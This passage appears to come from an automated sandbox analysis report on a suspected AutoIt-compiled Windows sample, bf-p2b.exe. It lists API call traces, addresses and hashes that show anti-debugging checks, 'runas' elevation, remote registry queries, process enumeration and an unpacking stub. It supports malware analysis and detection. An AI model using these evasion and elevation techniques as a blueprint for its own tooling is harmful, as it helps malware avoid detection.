65084->65203 65100->64985 65101->64989 65102->64997 65108->65021 65109->65023 65110->65027 65111->65028 65114 b2761d 65112->65114 65115 b2765a 65114->65115 65116 b2763b Sleep 65114->65116 65121 b33e5a 65114->65121 65115->65032 65118 b28b59 TlsSetValue 65115->65118 65117 b27652 65116->65117 65117->65114 65117->65115 65118->65036 65119->65039 65120->65035 65122 b33e65 65121->65122 65127 b33e80 __calloc_impl 65121->65127 65123 b33e71 65122->65123 
[Control-flow graph: interactive edge-list rendering not reproduced. The graph nodes cover sample code in the 0x00B0xxxx to 0x00B7xxxx range and name the Windows APIs called from it. Process and CRT: RtlAllocateHeap, RtlFreeHeap, RtlEnterCriticalSection, RtlLeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetLastError, Sleep, GetModuleHandleExW, GetProcAddress, ExitProcess, GetCurrentProcess, TerminateProcess, LoadLibraryA, LoadLibraryW, FreeLibrary, InterlockedDecrement. Window, tray and clipboard: PostQuitMessage, NtdllDefWindowProc_W, SetTimer, KillTimer, RegisterClipboardFormatW, CreatePopupMenu, Shell_NotifyIconW, MoveWindow, SetFocus, DeleteObject, DestroyWindow, LoadStringW, GetCursorPos, GetForegroundWindow, GetWindowRect, ClientToScreen, IsWindow, SendMessageW, SendMessageTimeoutW, CharLowerBuffW, CharUpperBuffW. COM: CoInitialize, GetRunningObjectTable, CoGetObject, VariantInit, VariantClear, SetErrorMode, lstrcmpiW. Network (Winsock): WSAStartup, WSACleanup, WSAGetLastError, gethostname, gethostbyname, inet_ntoa, inet_addr, htons, socket, connect, select, __WSAFDIsSet, closesocket. Files and registry: ReadFile, SetFilePointerEx, GetFileAttributesW, FindFirstFileW, FindClose, FindCloseChangeNotification, GetFileVersionInfoSizeW, GetFileVersionInfoW, RegConnectRegistryW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey. System fingerprinting and string conversion: GetVersionExW, GetSystemInfo, GetNativeSystemInfo, MultiByteToWideChar, WideCharToMultiByte.]

                          Control-flow Graph

                          APIs
                          • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00B0376D
                            • Part of subcall function 00B04257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\bf-p2b.exe,00000104,?,00000000,00000001,00000000), ref: 00B0428C
                          • IsDebuggerPresent.KERNEL32(?,?), ref: 00B0377F
                          • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\bf-p2b.exe,00000104,?,00BC1120,C:\Users\user\Desktop\bf-p2b.exe,00BC1124,?,?), ref: 00B037EE
                            • Part of subcall function 00B034F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00B0352A
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B03860
                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00BB2934,00000010), ref: 00B721C5
                          • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00B721FD
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00B72232
                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B9DAA4), ref: 00B72290
                          • ShellExecuteW.SHELL32(00000000), ref: 00B72297
                            • Part of subcall function 00B030A5: GetSysColorBrush.USER32(0000000F), ref: 00B030B0
                            • Part of subcall function 00B030A5: LoadCursorW.USER32(00000000,00007F00), ref: 00B030BF
                            • Part of subcall function 00B030A5: LoadIconW.USER32(00000063), ref: 00B030D5
                            • Part of subcall function 00B030A5: LoadIconW.USER32(000000A4), ref: 00B030E7
                            • Part of subcall function 00B030A5: LoadIconW.USER32(000000A2), ref: 00B030F9
                            • Part of subcall function 00B030A5: RegisterClassExW.USER32(?), ref: 00B03167
                            • Part of subcall function 00B02E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00B02ECB
                            • Part of subcall function 00B02E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B02EEC
                            • Part of subcall function 00B02E9D: ShowWindow.USER32(00000000), ref: 00B02F00
                            • Part of subcall function 00B02E9D: ShowWindow.USER32(00000000), ref: 00B02F09
                            • Part of subcall function 00B03598: _memset.LIBCMT ref: 00B035BE
                            • Part of subcall function 00B03598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B03667
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                          • String ID: C:\Users\user\Desktop\bf-p2b.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                          • API String ID: 4253510256-2895751819
                          • Opcode ID: 4afdf09c4d0f09ed7cffb405fed3aeb4a331051d24469d79da16f208d0dd041c
                          • Instruction ID: 86eb24923c80478e6787f02cdf50635fb8a599f305e5e7c1db20297a8b0bc7e5
                          • Opcode Fuzzy Hash: 4afdf09c4d0f09ed7cffb405fed3aeb4a331051d24469d79da16f208d0dd041c
                          • Instruction Fuzzy Hash: 4A51F675644244BFDB10ABA4DC4AFAD3FECDB0AB00F0444DAF646B31E2DE604A45CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00B63AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B62AA6,?,?), ref: 00B63B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B6317F
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00B6321E
                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B632B6
                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B634F5
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B63502
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                          • String ID:
                          • API String ID: 1240663315-0
                          • Opcode ID: b9e2de07cc4069ee0ec554165ed937d8c97b7e9ea87ad479e9a775e3cf53bbe3
                          • Instruction ID: 10fbafc2b8c6c5b6152a12aa77c7f260ff14e3bbef93b4e42dc5f817bf2839a5
                          • Opcode Fuzzy Hash: b9e2de07cc4069ee0ec554165ed937d8c97b7e9ea87ad479e9a775e3cf53bbe3
                          • Instruction Fuzzy Hash: EBE16D71604201AFC715DF25C891D2ABBE9EF89720F0485ADF44ADB3A1DB35EE01CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00B02A33
                          • KillTimer.USER32(?,00000001), ref: 00B02A5D
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B02A80
                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B02A8B
                          • CreatePopupMenu.USER32 ref: 00B02A9F
                          • PostQuitMessage.USER32(00000000), ref: 00B02AAE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                          • String ID: TaskbarCreated
                          • API String ID: 157504867-2362178303
                          • Opcode ID: 02e96954ecbf5a58791dcd1b136961b5e59e3eb44744e38f6b223c0270b0c128
                          • Instruction ID: 792407b42e40bb088485a7c62e197e20e81398dac22d6aa093e5ef268409293f
                          • Opcode Fuzzy Hash: 02e96954ecbf5a58791dcd1b136961b5e59e3eb44744e38f6b223c0270b0c128
                          • Instruction Fuzzy Hash: 3841F231304249ABDB24AB6C9C4DF793FD9EB15340F0045AAF906E31E2DE6088489765
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetVersionExW.KERNEL32(?,00000000), ref: 00B1E4A7
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • GetCurrentProcess.KERNEL32(00000000,00B9DC28,?,?), ref: 00B1E567
                          • GetNativeSystemInfo.KERNEL32(?,00B9DC28,?,?), ref: 00B1E5BC
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B1E5C7
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B1E5DA
                          • GetSystemInfo.KERNEL32(?,00B9DC28,?,?), ref: 00B1E5E4
                          • GetSystemInfo.KERNEL32(?,00B9DC28,?,?), ref: 00B1E5F0
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                          • String ID:
                          • API String ID: 2717633055-0
                          • Opcode ID: cba6acc9845d198c5efe7038ddbcbd3bb88a1d5e3047101014ca4ec8374266fc
                          • Instruction ID: 32536aa1b3796dac877c0ec7d6a285a359e1c7b5fe5077fabe66c0c0ae40deb0
                          • Opcode Fuzzy Hash: cba6acc9845d198c5efe7038ddbcbd3bb88a1d5e3047101014ca4ec8374266fc
                          • Instruction Fuzzy Hash: FE61BFB1809284CBCF15CF6898C11E97FF5AF3A304F5985E9DC589B24BE634C988CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B46F7D
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00B46F8D
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00B46FAC
                          • __wsplitpath.LIBCMT ref: 00B46FD0
                          • _wcscat.LIBCMT ref: 00B46FE3
                          • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00B47022
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                          • String ID:
                          • API String ID: 1605983538-0
                          • Opcode ID: 1075d7c409ad9a7dd8a9e0ae864e2ef0c7d3f426e450a06c50780f60d87ea81a
                          • Instruction ID: 00938e3f05e6285c6a7492937562d37f5bbaba709d16b410d8448087d0a42781
                          • Opcode Fuzzy Hash: 1075d7c409ad9a7dd8a9e0ae864e2ef0c7d3f426e450a06c50780f60d87ea81a
                          • Instruction Fuzzy Hash: 22214F71905218ABDB11ABA4DC88BEAB7FCEB49300F1004EAE545E3251EB759F84DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00B03219
                          • LoadResource.KERNEL32(?,00000000), ref: 00B757D7
                          • SizeofResource.KERNEL32(?,00000000), ref: 00B757EC
                          • LockResource.KERNEL32(?), ref: 00B757FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID: SCRIPT
                          • API String ID: 3473537107-3967369404
                          • Opcode ID: cbaf0cf4307effbdf937f87f80d3a5241e1f91073b11fb2e46c3b6c0b03037a5
                          • Instruction ID: ed54b2a1b464d55a529d0e944fa0998f1643b0b1dbc03e9f017058e9aabe4cca
                          • Opcode Fuzzy Hash: cbaf0cf4307effbdf937f87f80d3a5241e1f91073b11fb2e46c3b6c0b03037a5
                          • Instruction Fuzzy Hash: 8D112775200701BFEB259B65EC88F277BFDEBC9B51F2081A9B412972A0DB71DD00CA60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 00C8321A
                          • GetProcAddress.KERNEL32(?,00C7CFF9), ref: 00C83238
                          • ExitProcess.KERNEL32(?,00C7CFF9), ref: 00C83249
                          • VirtualProtect.KERNEL32(00B00000,00001000,00000004,?,00000000), ref: 00C83297
                          • VirtualProtect.KERNEL32(00B00000,00001000), ref: 00C832AC
                          Memory Dump Source
                          • Source File: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                          • String ID:
                          • API String ID: 1996367037-0
                          • Opcode ID: 310c225991a9bd2393153d6d2aacccfb14f21de40d599e04891a2682004e8f83
                          • Instruction ID: 3a8aa8d37153b56b1bdb0f04b686405071e2f2f102bb1079b9336778b5f6c4a8
                          • Opcode Fuzzy Hash: 310c225991a9bd2393153d6d2aacccfb14f21de40d599e04891a2682004e8f83
                          • Instruction Fuzzy Hash: 91512E71A443D25BDB20AEB8CCC8665B7A0EB52F287181738C9F2C73C6E7945B068758
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetFileAttributesW.KERNEL32(00B0C848,00B0C848), ref: 00B1DDA2
                          • FindFirstFileW.KERNEL32(00B0C848,?), ref: 00B74A83
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: File$AttributesFindFirst
                          • String ID:
                          • API String ID: 4185537391-0
                          • Opcode ID: 4eed80beb9585143c6bc1385d4ec2078e94c98ae0e96d1e51b29d0e22176f9db
                          • Instruction ID: bfcd49c5a09582cc81570291f38291964a5c0a3ea69a1ed251c7b029eceea1c1
                          • Opcode Fuzzy Hash: 4eed80beb9585143c6bc1385d4ec2078e94c98ae0e96d1e51b29d0e22176f9db
                          • Instruction Fuzzy Hash: 01E0D8314144015742147738EC4D8E937DC9E06339B500756F835D20F0EB709D40C6D6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 86c50ab21d93d70ed6deb0ef2fd7ccd4a4be6aafbe278b3c80ee0928ea136d45
                          • Instruction ID: 11f79763eb421ba46ca165e66f89c8702f872fb07a047c25fd2eedd9d9b7dd3d
                          • Opcode Fuzzy Hash: 86c50ab21d93d70ed6deb0ef2fd7ccd4a4be6aafbe278b3c80ee0928ea136d45
                          • Instruction Fuzzy Hash: DB229070900216DFDB24DF98C494AAABBF0FF18300F14C5A9E85AAB3D1D775E985CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID:
                          • API String ID: 3964851224-0
                          • Opcode ID: 6c56e2b482ac7670e655bca8c12f72520a097f942457232afa9c4a884e738a47
                          • Instruction ID: 3bbd50807f52a56183dfb8bc2028fefcfc872932b091870ff2a5ede51802e1da
                          • Opcode Fuzzy Hash: 6c56e2b482ac7670e655bca8c12f72520a097f942457232afa9c4a884e738a47
                          • Instruction Fuzzy Hash: 89926B70608341DFD724DF18C484BAABBE1FF88704F54889DE99A8B292D771ED85CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B0E279
                          • timeGetTime.WINMM ref: 00B0E51A
                          • TranslateMessage.USER32(?), ref: 00B0E646
                          • DispatchMessageW.USER32(?), ref: 00B0E651
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B0E664
                          • LockWindowUpdate.USER32(00000000), ref: 00B0E697
                          • DestroyWindow.USER32 ref: 00B0E6A3
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B0E6BD
                          • Sleep.KERNEL32(0000000A), ref: 00B75B15
                          • TranslateMessage.USER32(?), ref: 00B762AF
                          • DispatchMessageW.USER32(?), ref: 00B762BD
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B762D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                          • API String ID: 2641332412-570651680
                          • Opcode ID: 6eea0435f1f4feddf6ae0e7d7a28290500e4be65576b4da2813f0ae85e217fa1
                          • Instruction ID: b93e8d2138dd9881ee16c1de3dd01e693a791f468cab7956e0734a27cda61960
                          • Opcode Fuzzy Hash: 6eea0435f1f4feddf6ae0e7d7a28290500e4be65576b4da2813f0ae85e217fa1
                          • Instruction Fuzzy Hash: E962C1705083409FDB24DF24C895BAA7BE4FF44304F0449ADF96A9B2E2DBB5D848CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ___createFile.LIBCMT ref: 00B36C73
                          • ___createFile.LIBCMT ref: 00B36CB4
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00B36CDD
                          • __dosmaperr.LIBCMT ref: 00B36CE4
                          • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B36CF7
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00B36D1A
                          • __dosmaperr.LIBCMT ref: 00B36D23
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B36D2C
                          • __set_osfhnd.LIBCMT ref: 00B36D5C
                          • __lseeki64_nolock.LIBCMT ref: 00B36DC6
                          • __close_nolock.LIBCMT ref: 00B36DEC
                          • __chsize_nolock.LIBCMT ref: 00B36E1C
                          • __lseeki64_nolock.LIBCMT ref: 00B36E2E
                          • __lseeki64_nolock.LIBCMT ref: 00B36F26
                          • __lseeki64_nolock.LIBCMT ref: 00B36F3B
                          • __close_nolock.LIBCMT ref: 00B36F9B
                            • Part of subcall function 00B2F84C: FindCloseChangeNotification.KERNEL32(00000000,00BAEEC4,00000000,?,00B36DF1,00BAEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B2F89C
                            • Part of subcall function 00B2F84C: GetLastError.KERNEL32(?,00B36DF1,00BAEEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B2F8A6
                            • Part of subcall function 00B2F84C: __free_osfhnd.LIBCMT ref: 00B2F8B3
                            • Part of subcall function 00B2F84C: __dosmaperr.LIBCMT ref: 00B2F8D5
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          • __lseeki64_nolock.LIBCMT ref: 00B36FBD
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00B370F2
                          • ___createFile.LIBCMT ref: 00B37111
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00B3711E
                          • __dosmaperr.LIBCMT ref: 00B37125
                          • __free_osfhnd.LIBCMT ref: 00B37145
                          • __invoke_watson.LIBCMT ref: 00B37173
                          • __wsopen_helper.LIBCMT ref: 00B3718D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
